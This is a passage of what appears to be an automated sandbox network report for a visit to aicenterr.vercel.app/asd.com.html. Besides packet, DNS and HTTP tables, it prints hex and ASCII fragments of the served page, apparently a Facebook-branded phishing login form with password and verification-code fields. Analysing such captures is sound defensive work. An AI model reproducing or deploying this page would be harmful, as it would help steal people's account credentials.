                            Jan 14, 2025 01:50:08.559182882 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.559326887 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.559340000 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.599603891 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.649847984 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649877071 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649894953 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649931908 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.649938107 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649956942 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649982929 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.649982929 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.650005102 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.650008917 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.650048018 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.681870937 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.681894064 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.681936026 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.681937933 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.681962967 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.681972980 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.681983948 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.681992054 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.682028055 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.688576937 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.688644886 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.688656092 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.688719034 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.688747883 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.688805103 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.689081907 CET49719443192.168.2.5157.240.251.9
                            Jan 14, 2025 01:50:08.689094067 CET44349719157.240.251.9192.168.2.5
                            Jan 14, 2025 01:50:08.698185921 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:08.698239088 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:08.698313951 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:08.699306011 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:08.699337006 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:08.710573912 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:08.710592985 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:08.710680008 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:08.710954905 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:08.710971117 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.133872032 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.134233952 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.134248018 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.137850046 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.137932062 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.137939930 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.137994051 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.138523102 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.138600111 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.138808966 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.138814926 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.169167042 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.169650078 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:09.169666052 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.170011044 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.170583963 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:09.170640945 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.170880079 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:09.181446075 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.215328932 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.324529886 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.324794054 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.324867964 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:09.325691938 CET49722443192.168.2.564.29.17.129
                            Jan 14, 2025 01:50:09.325736046 CET4434972264.29.17.129192.168.2.5
                            Jan 14, 2025 01:50:09.338221073 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.338612080 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.338661909 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.339550972 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.339623928 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.340343952 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.340410948 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.340523005 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.340540886 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.377001047 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.377067089 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.377118111 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.377135038 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.377221107 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.377273083 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.382812977 CET49721443192.168.2.5185.15.59.240
                            Jan 14, 2025 01:50:09.382823944 CET44349721185.15.59.240192.168.2.5
                            Jan 14, 2025 01:50:09.386884928 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.620975971 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.621081114 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.621105909 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.667366028 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.699171066 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699181080 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699369907 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.699379921 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699420929 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699474096 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699496984 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.699521065 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.699533939 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.734028101 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.734044075 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.734128952 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.734150887 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.734215975 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.734215975 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.734221935 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.741246939 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.741307974 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:09.741338015 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.741545916 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.742216110 CET49723443192.168.2.5157.240.253.1
                            Jan 14, 2025 01:50:09.742230892 CET44349723157.240.253.1192.168.2.5
                            Jan 14, 2025 01:50:16.096487045 CET44349712142.250.186.100192.168.2.5
                            Jan 14, 2025 01:50:16.096656084 CET44349712142.250.186.100192.168.2.5
                            Jan 14, 2025 01:50:16.096766949 CET49712443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:50:17.465037107 CET49712443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:50:17.465070963 CET44349712142.250.186.100192.168.2.5
                            Jan 14, 2025 01:50:36.742995977 CET8049715216.198.79.129192.168.2.5
                            Jan 14, 2025 01:50:36.743087053 CET4971580192.168.2.5216.198.79.129
                            Jan 14, 2025 01:50:37.474728107 CET4971580192.168.2.5216.198.79.129
                            Jan 14, 2025 01:50:37.480865002 CET8049715216.198.79.129192.168.2.5
                            Jan 14, 2025 01:51:05.576697111 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:05.576735020 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:05.576816082 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:05.577038050 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:05.577052116 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:06.225210905 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:06.225501060 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:06.225513935 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:06.225747108 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:06.226264954 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:06.226304054 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:06.276249886 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:16.148622036 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:16.148755074 CET44349987142.250.186.100192.168.2.5
                            Jan 14, 2025 01:51:16.148828030 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:17.474239111 CET49987443192.168.2.5142.250.186.100
                            Jan 14, 2025 01:51:17.474257946 CET44349987142.250.186.100192.168.2.5
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 14, 2025 01:50:01.045109987 CET53525301.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:01.102279902 CET53519451.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:02.091310978 CET53617841.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:05.510726929 CET4946453192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:05.510833979 CET5790753192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:05.517258883 CET53494641.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:05.517944098 CET53579071.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:06.329090118 CET6436853192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:06.329421997 CET6299853192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:06.338202953 CET53643681.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:06.338493109 CET53629981.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:06.847661018 CET5387653192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:06.847996950 CET5178753192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:06.855580091 CET53517871.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:06.856779099 CET53538761.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:07.534554005 CET5375653192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:07.534554005 CET5561053192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:07.535156965 CET6074053192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:07.535156965 CET6371553192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:07.541233063 CET53537561.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:07.541543007 CET53556101.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:07.541940928 CET53637151.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:07.542242050 CET53607401.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:07.567338943 CET53590961.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:08.429617882 CET6019553192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:08.429866076 CET5295453192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:08.436745882 CET53529541.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:08.436783075 CET53601951.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:08.702344894 CET5998753192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:08.702503920 CET5892953192.168.2.51.1.1.1
                            Jan 14, 2025 01:50:08.709101915 CET53599871.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:08.710015059 CET53589291.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:19.190841913 CET53642981.1.1.1192.168.2.5
                            Jan 14, 2025 01:50:38.090060949 CET53581761.1.1.1192.168.2.5
                            Jan 14, 2025 01:51:00.835630894 CET53536451.1.1.1192.168.2.5
                            Jan 14, 2025 01:51:01.110974073 CET53587011.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 14, 2025 01:50:05.510726929 CET192.168.2.51.1.1.10xd460Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:05.510833979 CET192.168.2.51.1.1.10xad46Standard query (0)www.google.com65IN (0x0001)false
                            Jan 14, 2025 01:50:06.329090118 CET192.168.2.51.1.1.10x214bStandard query (0)aicenterr.vercel.appA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:06.329421997 CET192.168.2.51.1.1.10xcb8bStandard query (0)aicenterr.vercel.app65IN (0x0001)false
                            Jan 14, 2025 01:50:06.847661018 CET192.168.2.51.1.1.10x6153Standard query (0)aicenterr.vercel.appA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:06.847996950 CET192.168.2.51.1.1.10x117aStandard query (0)aicenterr.vercel.app65IN (0x0001)false
                            Jan 14, 2025 01:50:07.534554005 CET192.168.2.51.1.1.10x851Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:07.534554005 CET192.168.2.51.1.1.10x6966Standard query (0)upload.wikimedia.org65IN (0x0001)false
                            Jan 14, 2025 01:50:07.535156965 CET192.168.2.51.1.1.10xe1aeStandard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:07.535156965 CET192.168.2.51.1.1.10x4a75Standard query (0)static.xx.fbcdn.net65IN (0x0001)false
                            Jan 14, 2025 01:50:08.429617882 CET192.168.2.51.1.1.10x24fStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:08.429866076 CET192.168.2.51.1.1.10xde10Standard query (0)upload.wikimedia.org65IN (0x0001)false
                            Jan 14, 2025 01:50:08.702344894 CET192.168.2.51.1.1.10xe3f6Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:08.702503920 CET192.168.2.51.1.1.10x1be5Standard query (0)static.xx.fbcdn.net65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 14, 2025 01:50:05.517258883 CET1.1.1.1192.168.2.50xd460No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:05.517944098 CET1.1.1.1192.168.2.50xad46No error (0)www.google.com65IN (0x0001)false
                            Jan 14, 2025 01:50:06.338202953 CET1.1.1.1192.168.2.50x214bNo error (0)aicenterr.vercel.app216.198.79.129A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:06.338202953 CET1.1.1.1192.168.2.50x214bNo error (0)aicenterr.vercel.app64.29.17.129A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:06.856779099 CET1.1.1.1192.168.2.50x6153No error (0)aicenterr.vercel.app64.29.17.129A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:06.856779099 CET1.1.1.1192.168.2.50x6153No error (0)aicenterr.vercel.app216.198.79.129A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:07.541233063 CET1.1.1.1192.168.2.50x851No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:07.541940928 CET1.1.1.1192.168.2.50x4a75No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                            Jan 14, 2025 01:50:07.541940928 CET1.1.1.1192.168.2.50x4a75No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                            Jan 14, 2025 01:50:07.541940928 CET1.1.1.1192.168.2.50x4a75No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                            Jan 14, 2025 01:50:07.542242050 CET1.1.1.1192.168.2.50xe1aeNo error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                            Jan 14, 2025 01:50:07.542242050 CET1.1.1.1192.168.2.50xe1aeNo error (0)scontent.xx.fbcdn.net157.240.251.9A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:08.436783075 CET1.1.1.1192.168.2.50x24fNo error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:08.709101915 CET1.1.1.1192.168.2.50xe3f6No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                            Jan 14, 2025 01:50:08.709101915 CET1.1.1.1192.168.2.50xe3f6No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                            Jan 14, 2025 01:50:08.710015059 CET1.1.1.1192.168.2.50x1be5No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                            Jan 14, 2025 01:50:08.710015059 CET1.1.1.1192.168.2.50x1be5No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                            Jan 14, 2025 01:50:08.710015059 CET1.1.1.1192.168.2.50x1be5No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                            • aicenterr.vercel.app
                            • https:
                              • upload.wikimedia.org
                              • static.xx.fbcdn.net
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549714216.198.79.129803792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Jan 14, 2025 01:50:06.345252991 CET447OUTGET /asd.com.html HTTP/1.1
                            Host: aicenterr.vercel.app
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Jan 14, 2025 01:50:06.835206985 CET59INHTTP/1.0 308 Permanent Redirect
                            Content-Type: text/plain
                            Jan 14, 2025 01:50:06.835400105 CET143INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 61 69 63 65 6e 74 65 72 72 2e 76 65 72 63 65 6c 2e 61 70 70 2f 61 73 64 2e 63 6f 6d 2e 68 74 6d 6c 0d 0a 52 65 66 72 65 73 68 3a 20 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 61 69 63 65 6e 74
                            Data Ascii: Location: https://aicenterr.vercel.app/asd.com.htmlRefresh: 0;url=https://aicenterr.vercel.app/asd.com.htmlserver: VercelRedirecting...


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54971764.29.17.1294433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:07 UTC675OUTGET /asd.com.html HTTP/1.1
                            Host: aicenterr.vercel.app
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:07 UTC561INHTTP/1.1 200 OK
                            Accept-Ranges: bytes
                            Access-Control-Allow-Origin: *
                            Age: 210952
                            Cache-Control: public, max-age=0, must-revalidate
                            Content-Disposition: inline; filename="asd.com.html"
                            Content-Length: 10125
                            Content-Type: text/html; charset=utf-8
                            Date: Tue, 14 Jan 2025 00:50:07 GMT
                            Etag: "d0160795efa02c90ca63c23db2662ebc"
                            Last-Modified: Sat, 11 Jan 2025 14:14:14 GMT
                            Server: Vercel
                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                            X-Vercel-Cache: HIT
                            X-Vercel-Id: iad1::2mtsk-1736815807420-e60f1cdc39a5
                            Connection: close
                            2025-01-14 00:50:07 UTC2372INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a
                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Login Page</title> <style> body { margin: 0; padding:
                            2025-01-14 00:50:07 UTC992INData Raw: 20 20 20 20 2e 63 6f 75 6e 74 64 6f 77 6e 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 65 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 6d 65 74 61 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 30 36 37 37 30 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 61 75 74 68 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2f 2a 20 c4 90 e1 ba b7 74 20 63 68 69 e1 bb 81 75 20 72 e1 bb 99 6e 67 20 e1 ba a3 6e 68 20 62 e1 ba b1 6e 67 20
                            Data Ascii: .countdown { font-size: 14px; color: red; margin-top: 10px; } .meta-text { font-size: 18px; color: #606770; margin-top: 20px; } .auth-image { width: 100%; /* t chiu rng nh bng
                            2025-01-14 00:50:07 UTC4744INData Raw: 38 32 30 31 39 25 32 39 2e 73 76 67 22 20 61 6c 74 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 2d 66 6f 72 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 68 6f 6e 65 20 6e 75 6d 62 65 72 20 6f 72 20 65 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 69 64 3d 22 70 61 73 73
                            Data Ascii: 82019%29.svg" alt="Facebook Logo"> <br> <br> <br> <br> <br> <form id="login-form"> <input type="text" id="email" name="email" placeholder="Phone number or email" required> <input type="password" id="pass
                            2025-01-14 00:50:07 UTC2017INData Raw: 2f 20 42 69 e1 ba bf 6e 20 74 68 65 6f 20 64 c3 b5 69 20 73 e1 bb 91 20 6c e1 ba a7 6e 20 6e 68 e1 ba ad 70 20 73 61 69 0a 0a 20 20 20 20 61 75 74 68 46 6f 72 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 61 75 74 68 43 6f 64 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 75 74 68 2d 63 6f 64 65 22 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 63 6f 72 72 65 63 74 43 6f 64 65 20 3d 20 22 36 35 34 33 32 31 22 3b 20 2f 2f 20 4d c3 a3 20 78 c3 a1 63 20 74 68 e1 bb b1 63 20 c4
                            Data Ascii: / Bin theo di s ln nhp sai authForm.addEventListener("submit", function (event) { event.preventDefault(); const authCode = document.getElementById("auth-code").value; const correctCode = "654321"; // M xc thc


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549718185.15.59.2404433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:08 UTC637OUTGET /wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg HTTP/1.1
                            Host: upload.wikimedia.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://aicenterr.vercel.app/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:08 UTC1079INHTTP/1.1 200 OK
                            date: Tue, 14 Jan 2025 00:26:23 GMT
                            server: ATS/9.2.6
                            etag: W/17b573894ed72c1303e934d6bf56cf2f
                            content-type: image/svg+xml
                            x-object-meta-sha1base36: cfdxw9jjhgfj5a46toss1n5nzxbi3yz
